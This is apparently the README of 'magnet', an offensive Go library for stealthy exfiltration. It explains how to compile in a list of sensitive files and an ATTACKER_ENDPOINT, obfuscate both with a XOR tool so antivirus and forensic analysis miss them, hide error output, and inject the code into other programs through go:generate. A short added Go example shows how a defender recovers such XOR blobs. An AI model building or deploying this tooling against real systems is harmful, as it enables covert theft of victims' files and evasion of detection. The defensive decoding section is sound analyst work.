The library is built to fetch predefined files of interest from a remote device. It assumes that an HTTP endpoint is listening when the program is launched.
Executing the program on the target stealthily sends you the files you ask for.
You have 2 possibilities:
For educational purpose only or during pentest assessment with prior permission.
All the work is done at compilation time. You need to specify:
- The remote endpoint, where the juicy files are uploaded
- The juicy files: the list of files you want to grab
- The target OS, to fit the target (one of `windows`, `darwin`, `linux`)
- The method used for exfiltration (`http` or `tcp`)
```shell
export KEY=[YOUR_KEY]
export FILES=[FILENAME]
export ENDPOINT=[ATTACKER_ENDPOINT]
export METHOD=[EXFILTRATION_METHOD]
```
- Add the `magnet` import and declare the variables outside your `main()` function:

```go
import "github.com/ariary/magnet/pkg/magnet"

var FileList, Key, Endpoint, Method string
```
- Add the magnet payload in `main()`:

```go
sender := magnet.InitMagnetSender(Method)
magnet.Magnet(sender, FileList, Endpoint, Key, debug)
```
- Finally, modify the build command by adding `-ldflags "-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'"` and `CGO_ENABLED=0` (see how the `magnet` environment variables are declared above).
To build the `magnet` binary in one step:

```shell
# ensure lobfuscator is in your PATH
./build.sh $FILES $ENDPOINT $KEY $METHOD
```

See `lobfuscator` and the full example.
To avoid detection systems, since we are seeking sensitive files, the files we want to grab must not appear in clear text within the binary. Hence it uses basic encryption, with the key needed to decrypt them embedded in the binary. (The aim is only to evade AV and detection systems, not to have a strong encryption scheme.)
The same is done for the remote endpoint, to make forensic analysis harder.
`lobfuscator` is the simple tool that performs the XOR encryption/decryption.
An example to build the obfuscated list:

```shell
cat [FILE] | lobfuscator $KEY > obfuscated.txt
# decrypt: cat obfuscated.txt | lobfuscator -d $KEY
```

To build `lobfuscator`:

```shell
make build.lobfuscator
```
Define the `FILES` and `ENDPOINT` environment variables:

```shell
export FILES=$(cat [FILE] | lobfuscator $KEY)
export ENDPOINT=$(echo "[ENDPOINT]" | lobfuscator $KEY)
```
You can also use `lobfuscator` without providing a key (it will generate a random key the size of the input):

```shell
# Encrypt with random key
cat samples/linux_juicy_files.txt | ./lobfuscator > encrypted.txt 2>tmp.txt && cat tmp.txt | cut -d ":" -f 2- > keys.txt && rm tmp.txt
# Decrypt using file containing keys
cat encrypted.txt | ./lobfuscator -d -kf keys.txt
```
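The scheme above is obfuscation rather than encryption: the XOR key has to ship inside the binary next to the blob, so an analyst who holds the binary already has everything needed to recover the list (values injected with `-ldflags -X` are ordinary string data in the binary, which is why the page obfuscates them before injection). The following Go program is an added example written for this page, not code from magnet or lobfuscator. It shows the analyst-side recovery of a repeating-key XOR blob; the hex encoding of the blob, the key `k3y` and the two-entry file list are constructed assumptions that stand in for a blob and key carved out of a suspect binary, since lobfuscator's actual output encoding is not documented here.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"strings"
)

// xorWithKey applies a repeating-key XOR to data. XOR is its own inverse,
// so the same call turns a plaintext into the blob and the blob back into
// the plaintext.
func xorWithKey(data, key []byte) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

// recoverList takes a hex-encoded XOR blob and the key that was shipped
// beside it, and returns the embedded file list line by line.
// Hex encoding is an assumption made for this demo; lobfuscator's real
// output encoding is not described on this page.
func recoverList(blobHex, key string) ([]string, error) {
	if key == "" {
		return nil, fmt.Errorf("empty key")
	}
	blob, err := hex.DecodeString(blobHex)
	if err != nil {
		return nil, fmt.Errorf("blob is not valid hex: %w", err)
	}
	plain := string(xorWithKey(blob, []byte(key)))
	var files []string
	for _, line := range strings.Split(plain, "\n") {
		line = strings.TrimSpace(line)
		if line != "" {
			files = append(files, line)
		}
	}
	return files, nil
}

// demoBlob builds the constructed sample: a harmless two-entry list
// obfuscated with a short key (both are assumptions for this demo),
// standing in for a blob and key recovered from a binary under analysis.
func demoBlob() (blobHex, key string) {
	key = "k3y"
	plain := "/etc/hostname\n/etc/hosts\n"
	return hex.EncodeToString(xorWithKey([]byte(plain), []byte(key))), key
}

func main() {
	blobHex, key := demoBlob()
	fmt.Println("blob:", blobHex)
	files, err := recoverList(blobHex, key)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, f := range files {
		fmt.Println("recovered:", f)
	}
}
```

The point for a defender is the asymmetry of effort: producing the blob and undoing it are the same one-line loop, so once the key is located in the binary the "encrypted" list and endpoint are fully readable, exactly as the author states the scheme is meant only to defeat signature matching.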
- For the remote endpoint, I suggest you use the `/push` endpoint of the `agitar` listener.
- The software is built to be stealthy, hence:
  - error handling is not verbose (hidden flag to get more verbosity: `-thisisdebug`)
  - I suggest overwriting the usage string in `magnet.go` to fit your attack scenario (for standalone use)
- To enhance the binary obfuscation, use `garble` to compile `magnet` instead of `go` (adapt `build.sh` accordingly).
- Handle directories
- Use other protocols to send files (ICMP, DNS, SMTP, etc.)
The `magnetgen` tool is in the making; it will be used with a `//go:generate` comment to stealthily inject the magnet code.